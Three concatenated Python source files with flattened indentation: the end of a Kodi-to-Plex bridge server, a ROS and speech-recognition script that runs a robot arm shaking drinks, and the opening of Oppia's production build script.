for character in sorted(character_dict.keys()):
root.append(xml.etree.ElementTree.Element("Directory", attrib={"size": str(character_dict[character]),
"key": character,
"title": character}))
elif "sorts" == option:
sort_dict = {"Date Added": "dateadded",
"Date Viewed": "lastplayed",
"Name": "label",
"Rating": "rating"}
for sort_name, sort_key in sort_dict.items():
root.append(xml.etree.ElementTree.Element("Directory", attrib={"defaultDirection": "desc",
"descKey": "%s:desc" % sort_key,
"key": sort_key,
"title": sort_name}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_section(request):
"""
Returns the items for a sections
"""
section_id = int(request.match_info['section_id'])
sort_type, sort_direction = request.GET.get("sort", "label:asc").split(":")
sort_direction = "ascending" if sort_direction == "asc" else "descending"
# on Android we sometimes get this sort as default, so we change it
if "titleSort" == sort_type:
sort_type = "label"
logger.debug("Request for library section %s, sort type %s and direction %s", section_id, sort_type, sort_direction)
if 0 == section_id:
start_item = int(request.GET.get("X-Plex-Container-Start", 0))
end_item = start_item + int(request.GET.get("X-Plex-Container-Size", 0))
return await get_all_movies(request,
"movies",
kodi_request(request.app,
"VideoLibrary.GetMovies",
{"limits": {"start": start_item,
"end": end_item if end_item != start_item else start_item + 1},
"properties": ["rating", "thumbnail", "playcount", "file", "year", "plot"],
"sort": {"order": sort_direction, "method": sort_type}}))
elif 1 == section_id:
return await get_all_tvshows(request)
else:
section_id -= 2
playlist = request.app["playlists"][section_id]
pprint.pprint(playlist)
return await get_all_movies(request,
"files",
kodi_request(request.app,
"Files.GetDirectory",
[playlist["file"],
"video",
["rating", "thumbnail", "playcount", "file", "year", "plot"],
{"order": sort_direction, "method": sort_type}]))
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_tvshow_info(request):
tvshow_id = int(request.match_info["tvshow_id"])
show_info = await kodi_request(request.app,
"VideoLibrary.GetTVShowDetails",
[tvshow_id,
["title", "genre", "year", "rating", "plot", "studio", "mpaa", "cast",
"playcount", "episode", "imdbnumber", "premiered", "votes", "lastplayed",
"fanart", "thumbnail", "file", "originaltitle", "sorttitle", "episodeguide",
"season", "watchedepisodes", "dateadded", "tag", "art"]])
show_info = show_info["result"]["tvshowdetails"]
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library"})
video_node = xml.etree.ElementTree.Element("Directory",
attrib={"type": "show",
"key": "/library/metadata/tvshow/%d/children" % tvshow_id,
"title": show_info['label'],
"studio": "" if not show_info['studio'] else show_info['studio'][0],
"summary": show_info['plot'],
"year": str(show_info['year']),
"rating": str(show_info["rating"]),
"art": show_info["fanart"],
"thumb": show_info['thumbnail']})
root.append(video_node)
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_tvshow(request):
tvshow_id = int(request.match_info["tvshow_id"])
all_seasons = await kodi_request(request.app,
"VideoLibrary.GetSeasons",
[tvshow_id,
["season", "playcount", "watchedepisodes", "episode", "thumbnail", "tvshowid"]])
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library",
"viewGroup": "season",
"key": str(tvshow_id)})
for season in all_seasons["result"]["seasons"]:
root.append(xml.etree.ElementTree.Element("Directory", attrib={"leafCount": str(season["episode"]),
"type": "season",
"title": season["label"],
"index": str(season["season"]),
"thumb": season['thumbnail'],
"viewedLeafCount": str(season["watchedepisodes"]),
"parentRatingKey": str(tvshow_id),
"ratingKey": "tv%ds%d" % (tvshow_id, season['season']),
"key": "/library/metadata/tvshow/%d/%d/children" % (tvshow_id, season['season'])}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_tvshow_season(request):
tvshow_id = int(request.match_info["tvshow_id"])
season = int(request.match_info["season"])
if request.path.endswith("/children"):
all_episodes = await kodi_request(request.app,
"VideoLibrary.GetEpisodes",
[tvshow_id,
season,
["title", "plot", "votes", "rating", "writer", "firstaired", "playcount", "runtime",
"director", "productioncode", "season", "episode", "originaltitle", "showtitle",
"cast", "streamdetails", "lastplayed", "fanart", "thumbnail", "file", "resume",
"tvshowid", "dateadded", "uniqueid", "art"]])
root = xml.etree.ElementTree.Element("MediaContainer",
attrib={"identifier": "com.plexapp.plugins.library",
"viewGroup": "episode",
"parentIndex": str(season),
"nocache": "1",
"key": str(tvshow_id)})
for episode in all_episodes["result"]["episodes"]:
root.append(xml.etree.ElementTree.Element("Video",
attrib={"type": "episode",
"title": episode["title"],
"index": str(episode["episode"]),
"thumb": episode['thumbnail'],
"summary": episode['plot'],
"viewCount": str(episode['playcount']),
"viewOffset": str(int(episode["resume"]["position"]*1000)),
"parentRatingKey": str(tvshow_id),
"key": "/library/metadata/episode/%d" % episode["episodeid"],
"parentKey": "/library/metadata/tvshow/%d/%d" % (tvshow_id, season)}))
else:
show_info = await kodi_request(request.app,
"VideoLibrary.GetTVShowDetails",
[tvshow_id,
["title", "genre", "year", "rating", "plot", "studio", "mpaa", "cast",
"playcount", "episode", "imdbnumber", "premiered", "votes", "lastplayed",
"fanart", "thumbnail", "file", "originaltitle", "sorttitle", "episodeguide",
"season", "watchedepisodes", "dateadded", "tag", "art"]])
show_info = show_info["result"]["tvshowdetails"]
root = xml.etree.ElementTree.Element("MediaContainer", attrib={"identifier": "com.plexapp.plugins.library"})
root.append(xml.etree.ElementTree.Element("Directory",
attrib={"type": "season",
"parentRatingKey": str(tvshow_id),
"title": "Season %d" % season,
"parentTitle": show_info['label'],
"art": show_info["fanart"],
"thumb": show_info['thumbnail'],
"index": str(season),
"key": "/library/metadata/tvshow/%d/%d/children" % (tvshow_id, season)}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_episode(request):
episode_id = int(request.match_info["episode_id"])
root = xml.etree.ElementTree.Element("MediaContainer",
attrib={"identifier": "com.plexapp.plugins.library"})
root.append(await get_episode_node(request.app, episode_id))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_library_metadata_movie(request):
movie_id = int(request.match_info["movie_id"])
return await _get_library_metadata_movie(request, movie_id)
async def _get_library_metadata_movie(request, movie_id):
"""
Returns the metadata for a movie
:returns: an empty MediaContainer
"""
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
root.append(await get_movie_node(request.app, movie_id))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_prefs(request):
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
root.append(xml.etree.ElementTree.Element("Setting",
attrib={"id": "FriendlyName",
"label": "Friendly name",
"default": "",
"summary": "This name will be used to identify this media server to other computers on your network."
"If you leave it blank, your computer's name will be used instead.",
"type": "text",
"value": "",
"hidden": "0",
"advanced": "0",
"group": "general"}))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def post_playqueues(request):
play_uri = request.GET["uri"].split("%2F")
video_id = int(play_uri[-1])
print(request.GET["uri"])
root = xml.etree.ElementTree.Element("MediaContainer",
attrib={"playQueueID": str(request.app["playqueuecounter"] + 1),
"playQueueSelectedItemID": str(request.app["playqueuecounter"]),
"playQueueSelectedMetadataItemID": str(video_id),
"playQueueSourceURI": "library://50956afc-8f35-435d-9643-4142a7232186/item/%2Flibrary%2Fmetadata%2F"
+ str(video_id),
"playQueueSelectedItemOffset": "0"})
request.app["playqueuecounter"] += 1
if "movie" == play_uri[-2]:
root.append(await get_movie_node(request.app, video_id))
elif "episode" == play_uri[-2]:
root.append(await get_episode_node(request.app, video_id))
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_empty(request):
"""
Simple handler for unknown requests
:returns: an empty MediaContainer
"""
root = xml.etree.ElementTree.Element("MediaContainer", attrib={})
if request.app["debug"]:
logger.debug(_xml_prettify(root))
return aiohttp.web.Response(body=b'<?xml version="1.0" encoding="UTF-8"?>' + xml.etree.ElementTree.tostring(root))
async def get_kodidownload(request):
"""
Downloads a file from KODI
:returns: returns the file
"""
to_download_url = request.GET["url"]
# sometimes Plex clients send a http as prefix
if to_download_url.startswith("http://"):
# FIX IT by removing iter
if "image://" in to_download_url:
to_download_url = "image://" + to_download_url.split("image://")[1]
logger.debug("Got request to download '%s'", to_download_url)
download_info = await kodi_request(request.app, "Files.PrepareDownload", [to_download_url])
download_url = request.app["kodi"] + download_info['result']['details']['path']
kodi_response = await request.app["client_session"].get(download_url)
logger.debug("Download URL: %s", download_url)
return aiohttp.web.Response(body=await kodi_response.read())
async def send_websocket_notification(app):
for ws in app['websockets']:
ws.send_str("""{
"_elementType": "NotificationContainer",
"type": "timeline",
"size": 1,
"_children": [
{
"_elementType": "TimelineEntry",
"sectionID": 1,
"itemID": 8,
"type": 1,
"title": "Life of Crime",
"state": 5,
"mediaState": "analyzing",
"updatedAt": 1467101125
}
]
}""")
async def websocket_handler(request):
# Create response
resp = aiohttp.web.WebSocketResponse()
# try to uypdate
ok, protocol = resp.can_prepare(request)
if not ok:
logger.error("Couldn't upgrade to WebSocket")
return None
# repare
await resp.prepare(request)
# add to clients
request.app['websockets'].append(resp)
logger.debug("WebSocket connected")
# keep the connections
async for msg in resp:
# just loop for now
pass
# we are done => disconnect and remove
request.app['websockets'].remove(resp)
logger.debug('WebSocket disconnected')
# return
return resp
if __name__ == "__main__":
# parse the command line arguments
parser = argparse.ArgumentParser(description='Kodi2Plex')
parser.add_argument('-kp', '--kodi-port', metavar='port', type=int, help='Port if the kodi web interface', default=8080)
parser.add_argument('-kh', '--kodi-host', metavar='ip/hostname', type=str, help='Name or IP of the kodi machine')
parser.add_argument('-pp', '--plex-port', metavar='port', type=int, help='Port of the plex interface (default=32400)', default=32400)
parser.add_argument('-pw', '--plex-web', metavar='location of WebClient.bundle', type=str,
help='location of the WebClient.bundle to activate the Plex Web Client')
parser.add_argument('-gdm', action='store_true', help="Broadcast the server via GDM (Good day mate) so Plex client can find the server automatically")
parser.add_argument('-n', '--name', metavar='display name', type=str, help='Name for display in Plex', default="Kodi2Plex")
parser.add_argument('-v', '--verbose', action='store_true', help="Shows a lot of messages")
parser.add_argument('-d', '--debug', action='store_true', help="Shows a lot of DEBUG messages!!!!")
args = parser.parse_args()
# create the logegr
logger = logging.getLogger("kodi2plex")
# add a stream handler
ch = logging.StreamHandler()
logger.addHandler(ch)
# set logging.DEBUG if the user has specified -v or -d
if args.verbose or args.debug:
logger.setLevel(logging.DEBUG)
logger.debug(args)
# no host => no go
if not args.kodi_host:
logger.error("No kodi host defined")
sys.exit(-1)
# the MAIN LOOP we are living in
main_loop = asyncio.get_event_loop()
# the aiohttp Application instance (subclass of dict)
kodi2plex_app = aiohttp.web.Application(middlewares=[IndexMiddleware()], # the middleware is required to
# convert */ to */index.html
loop=main_loop,
logger=logger)
# set some settings
kodi2plex_app["title"] = args.name
kodi2plex_app["kodi"] = "http://%s:%d/" % (args.kodi_host, args.kodi_port)
kodi2plex_app["kodi_url"] = "http://%s:%d/jsonrpc" % (args.kodi_host, args.kodi_port)
kodi2plex_app["server_ip"] = socket.gethostbyname(socket.gethostname())
kodi2plex_app["kodi_jsonrpc_counter"] = 0
kodi2plex_app["client_session"] = aiohttp.ClientSession()
kodi2plex_app["playlists"] = []
kodi2plex_app["debug"] = args.debug
kodi2plex_app["playqueuecounter"] = 0
main_loop.run_until_complete(init_kodi(kodi2plex_app))
# Has the user defined a path to the WebClient.bundle from Plex?
if args.plex_web:
# try using it
web_path = os.path.join(os.path.realpath(args.plex_web), "Contents", "Resources")
# Does it exist?
if not os.path.exists(web_path):
logger.error("WebClient path does not exists: %s", web_path)
sys.exit(-1)
logger.info("Using WebClient from %s", web_path)
# add a route to the directory
kodi2plex_app.router.add_static('/web/', web_path)
kodi2plex_app.router.add_route('GET', '/', get_root)
kodi2plex_app.router.add_route('GET', '/library/sections', get_library_sections)
kodi2plex_app.router.add_route('GET', '/library/sections/{section_id:\d+}/{option}', get_library_section)
kodi2plex_app.router.add_route('GET', '/library/metadata/movie/{movie_id:\d+}', get_library_metadata_movie)
kodi2plex_app.router.add_route('GET', '/library/metadata/tvshow/{tvshow_id:\d+}', get_library_metadata_tvshow_info)
kodi2plex_app.router.add_route('GET', '/library/metadata/tvshow/{tvshow_id:\d+}/children', get_library_metadata_tvshow)
kodi2plex_app.router.add_route('GET', '/library/metadata/tvshow/{tvshow_id:\d+}/{season:\d+}', get_library_metadata_tvshow_season)
kodi2plex_app.router.add_route('GET', '/library/metadata/tvshow/{tvshow_id:\d+}/{season:\d+}/children', get_library_metadata_tvshow_season)
kodi2plex_app.router.add_route('GET', '/library/metadata/episode/{episode_id:\d+}', get_library_metadata_episode)
kodi2plex_app.router.add_route('GET', '/:/prefs', get_prefs)
kodi2plex_app.router.add_route('POST', '/playQueues', post_playqueues)
kodi2plex_app.router.add_route('GET', '/photo/:/transcode', get_kodidownload)
kodi2plex_app['websockets'] = []
kodi2plex_app.router.add_route('GET', '/:/websockets/{path:.*}', websocket_handler)
# per default we return an empty MediaContainer
# !!!!! NEEDS TO BE THE LAST ROUTE
kodi2plex_app.router.add_route('GET', '/{tail:.*}', get_empty)
# setup gdm?
if args.gdm:
GDM_ADDR = '239.0.0.250'
GDM_PORT = 32414
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', GDM_PORT))
# add the socket to the multicast group on all interfaces.
group = socket.inet_aton(GDM_ADDR)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
gdm_thread = threading.Thread(target=gdm_broadcast, args=(sock, kodi2plex_app))
gdm_thread.start()
handler = kodi2plex_app.make_handler(debug=args.debug, access_log=logger if args.debug or args.verbose else None)
f = main_loop.create_server(handler, '0.0.0.0', args.plex_port)
srv = main_loop.run_until_complete(f)
logger.debug('serving on %s', srv.sockets[0].getsockname())
try:
main_loop.run_forever()
except KeyboardInterrupt:
pass
finally:
srv.close()
main_loop.run_until_complete(srv.wait_closed())
main_loop.run_until_complete(kodi2plex_app.shutdown())
main_loop.run_until_complete(handler.finish_connections(60.0))
main_loop.run_until_complete(kodi2plex_app.cleanup())
main_loop.close()
# shut down GDM nicely
if args.gdm:
sock.close()
gdm_thread.join()
|
shake_strategy_trigger.py | #!/usr/bin/env python3
# license removed for brevity
#encoding:utf-8
# smart-shaking strategy trigger for hiwin manipulator RA605 (need connection)
# =======================================================================
# =15/07/2019:add step select, write out position adjust result =
# =13/07/2019:add simulation =
# =12/07/2019:import most functions instead of define =
# = updated control package; add position adjust =
# = incorporate move_test, move_drink, coordinate_collation =
# =======================================================================
import datetime
import enum
import os
import threading
import tkinter as tk
from time import sleep, time
import numpy as np
import rospy
import speech_recognition as sr
from ROS_Socket.msg import *
from ROS_Socket.srv import *
from std_msgs.msg import Int32MultiArray, String
import Hiwin_RT605_Socket as ArmTask
import pos_change_interface as pos_inter
import shake_strategy_content as shake_cont
##----Arm state-----------
Arm_state_flag = 0
Sent_data_flag = 1
t=time()
##----Arm status enum
class Arm_status(enum.IntEnum):
Idle = 0
Isbusy = 1
Error = 2
shutdown = 6
def callback(state):
global Arm_state_flag,Sent_data_flag,t
# print('get callback!\t{:.3f}\ts'.format(time()-t))
t=time()
Arm_state_flag = state.data[0]
Sent_data_flag = state.data[1]
def arm_state_listener():
rospy.Subscriber("chatter", Int32MultiArray, callback)
###-------------------------strategy---------------------
##-------move control part-------------
wait_for_enter_flag = False
adjust_pos_flag = False
to_change_flag = False
Target_Pos=shake_cont.Point_cls(shake_cont.Current_Pos.x,shake_cont.Current_Pos.y,shake_cont.Current_Pos.z,
shake_cont.Current_Pos.pitch,shake_cont.Current_Pos.roll,shake_cont.Current_Pos.yaw)
def RefreshTargetPos():
global Sent_data_flag,Arm_state_flag,Target_Pos
shake_cont.Hiwin_Move_Log.WriteOut(shake_cont.Pos_diff)
for var in range(6):
Target_Pos.ChangeSelf(var,shake_cont.Pos_diff[var])
ArmTask.point_data(Target_Pos.x,Target_Pos.y,Target_Pos.z,Target_Pos.pitch,Target_Pos.roll,Target_Pos.yaw)
ArmTask.Arm_Mode(2,1,shake_cont.gp_stop,shake_cont.speed_value,2)#action,ra,grip,vel,both
print('current position: ',[Target_Pos.x,Target_Pos.y,Target_Pos.z,Target_Pos.pitch,Target_Pos.roll,Target_Pos.yaw])
shake_cont.Pos_diff=[float(0) for i in range(6)]
while 1:
if Sent_data_flag and Arm_state_flag == Arm_status.Idle:
break
def Adjust_Pos(string):
global to_change_flag,Target_Pos
Target_Pos=shake_cont.Point_cls(shake_cont.Current_Pos.x,shake_cont.Current_Pos.y,shake_cont.Current_Pos.z,
shake_cont.Current_Pos.pitch,shake_cont.Current_Pos.roll,shake_cont.Current_Pos.yaw)
# pos_inter.PosChange()
pos_change_thread=threading.Thread(target=pos_inter.PosChange)
pos_change_thread.start()
while not shake_cont.pos_ok_flag:
print('Waiting for OK to move to next point...')
pos_change_thread.join()
shake_cont.Adjust_Log.WriteOut(string+':'+str(Target_Pos.x)+','+str(Target_Pos.y)+','+str(Target_Pos.z)+','+str(Target_Pos.pitch)+','+str(Target_Pos.roll)+','+str(Target_Pos.yaw))
def Hiwin_Move(Position,speed,grip,string):
global Sent_data_flag,Arm_state_flag,wait_for_enter_flag,t
if wait_for_enter_flag:
# input("下一步按Enter")
tk.messagebox.showinfo(message='Next Point?')
ArmTask.Speed_Mode(shake_cont.arm_speed_mode)
ArmTask.Arm_Mode(4,1,grip,speed,2)#action,ra,grip,vel,both
ArmTask.point_data(Position.x,Position.y,Position.z,Position.pitch,Position.roll,Position.yaw)
ArmTask.Arm_Mode(shake_cont.move_mode,1,grip,speed,2)#action,ra,grip,vel,both
print(shake_cont.move_mode)
shake_cont.Hiwin_Move_Log.WriteOut(string+':')
shake_cont.Hiwin_Move_Log.WriteOut('to position: '+str([Position.x,Position.y,Position.z,Position.pitch,Position.roll,Position.yaw]))
if grip==shake_cont.gp_stop:
sleep(0.75)
else:
sleep(0.8)
while 1:
if Sent_data_flag == 1 and Arm_state_flag == Arm_status.Idle:
# print('arm idle\t{:.3f}\ts'.format(time()-t))
t=time()
break
if adjust_pos_flag:
Adjust_Pos(string)
Hiwin_Action=shake_cont.Action_cls(Hiwin_Move)
Hiwin_Shake_Strategy=shake_cont.Shake_Strategy_cls(1,2,1,~wait_for_enter_flag)
def Shake():
global wait_for_enter_flag,adjust_pos_flag
if Hiwin_Shake_Strategy.CheckCmd():
shake_cont.move_str=shake_cont.cmd_str
shake_cont.Hiwin_Move_Log.StartWrite('Real Action')
shake_cont.Hiwin_Move_Log.WriteDate()
Hiwin_Shake_Strategy.SmartShaking(Hiwin_Action)
tk.messagebox.showinfo(title='Finished!',message='Time used:\n {:.0f} m {:.2f} s'.format((time()-shake_cont.start_time)//60,(time()-shake_cont.start_time)%60))
shake_cont.Home(Hiwin_Action)
wait_for_enter_flag=False
adjust_pos_flag=False
##-------move control part end-------------
##-------speech recgnition part-------------
def SpeechTriggerShaking():
global wait_for_enter_flag,adjust_pos_flag
while True:
# Record Audio
r = sr.Recognizer()
with sr.Microphone() as source:
r.adjust_for_ambient_noise(source, duration=0.5)
print("Say something!")
audio = r.listen(source)
# Speech recognition using Google Speech Recognition
try:
shake_cont.cmd_str = r.recognize_google(audio,language = 'zh-TW')
shake_cont.move_str=shake_cont.cmd_str
if Hiwin_Shake_Strategy.CheckCmd():
break
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
shake_cont.Hiwin_Move_Log.StartWrite('')
shake_cont.Hiwin_Move_Log.WriteDate()
Hiwin_Shake_Strategy.SmartShaking(Hiwin_Action)
tk.messagebox.showinfo(title='Finished!',message='Time used:\n {:.0f} m {:.2f} s'.format((time()-shake_cont.start_time)//60,(time()-shake_cont.start_time)%60))
shake_cont.Home(Hiwin_Action)
wait_for_enter_flag=False
adjust_pos_flag=False
##-------speech recgnition part end-------------
def DefaultShaking():
global wait_for_enter_flag
shake_cont.cmd_str='冬瓜紅茶半糖全冰'
wait_for_enter_flag=False
Hiwin_Shake_Strategy.delay_flag=~wait_for_enter_flag
Shake()
class Solo_Action_cls(shake_cont.Action_cls):
def __init__(self,action):
self.action=action
def ArmMove(self,Position,speed,grip,string):
shake_cont.move_mode=2
shake_cont.move_str=string
shake_cont.Current_Pos=shake_cont.Point_cls(Position.x,Position.y,Position.z,Position.pitch,Position.roll,Position.yaw)
self.action.MoveFunc(Position,speed,grip,string)
sleep(0.5)
def GripCtrl(self,Position,speed,gp_ctrl,move_str,grip_str):
self.ArmMove(Position,speed,shake_cont.gp_stop,move_str) #move
shake_cont.Current_grip=shake_cont.grip_state_str.split()[gp_ctrl]
self.ArmMove(Position,speed,gp_ctrl,grip_str) #grip
# sleep()
if shake_cont.grip_delay:
sleep(0.5)
Hiwin_Solo_Action=Solo_Action_cls(Hiwin_Action)
def CoordinateCollation():
while 1:
input("左下定位")
shake_cont.Left(Hiwin_Action)
input("右上定位")
shake_cont.Right(Hiwin_Action)
if input('OK?')=='1':
shake_cont.Home(Hiwin_Action)
break
def PosAdjust():
global adjust_pos_flag
adjust_pos_flag=True
shake_cont.Adjust_Log.WriteDate()
Shake()
###-------------strategy end-----------------
if __name__ == '__main__':
argv = rospy.myargv()
rospy.init_node('strategy', anonymous=True)
GetInfoFlag = True #Test no data
arm_state_listener()
while 1:
start_cmd_str=int(input('請輸入指令:\n\t開始錄音:\t1\n\t默認飲料:\t2\n\t坐標測試:\t3\n\t坐標校正:\t4\n\t默認模擬:\t5\n\t離開:\t\tEnter\n')) #輸入開始指令
shake_cont.speed_value=int(input('速度設定:'))
print('輸入要跳過的步驟:\n1: 加冰塊\n2: 加飲料\n3: 加果糖\n4: 蓋大蓋\n5: 搖飲\n6: 取小蓋\n7: 倒入手搖杯')
skip_step_flag=[int(i) for i in input().split()]
for step in skip_step_flag:
shake_cont.step_flag[step-1]=False
if start_cmd_str == 1 :
SpeechTriggerShaking()
elif start_cmd_str == 2 :
DefaultShaking()
elif start_cmd_str == 3 :
shake_cont.cmd_str='冬瓜紅茶半糖少冰'
PosAdjust()
# coordinate collation
elif start_cmd_str == 4:
CoordinateCollation()
else:
break
##--------------shut dowm-------------
shake_cont.byebye()
ArmTask.rospy.spin()
rospy.spin()
|
build.py | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
# pylint: disable=invalid-name
import argparse
import collections
import fnmatch
import hashlib
import json
import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', 'dev', 'head', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', 'dev', 'head', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', 'head', ''),
'out_dir': os.path.join('build', 'templates', 'head', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This json file contains a json object. The object's keys are file paths and
# the values are corresponded hash value. The paths need to be in posix style,
# as it is interpreted by the `url-interpolation` service, which which
# interprets the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
# Files with these extensions shouldn't be moved to build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts')
# Files with these name patterns shouldn't be moved to build directory, and will
# not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'dev', 'head', 'expressions',
'expression-parser.service.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files or should not be moved to the build directory.
# Statically served pages from app.yaml should be here to since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/splash-page.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html')
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json')
HASH_BLOCK_SIZE = 2**20
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
def generate_app_yaml(is_prod_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
is_prod_mode: bool. Whether the script is being called
with --prod_env flag or not.
"""
prod_file_prefix = 'build/'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in FILEPATHS_NOT_TO_RENAME:
if 'webpack_bundles/' in file_path:
content = content.replace(
file_path,
prod_file_prefix + file_path)
if not is_prod_mode:
content = content.replace('version: default', '')
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
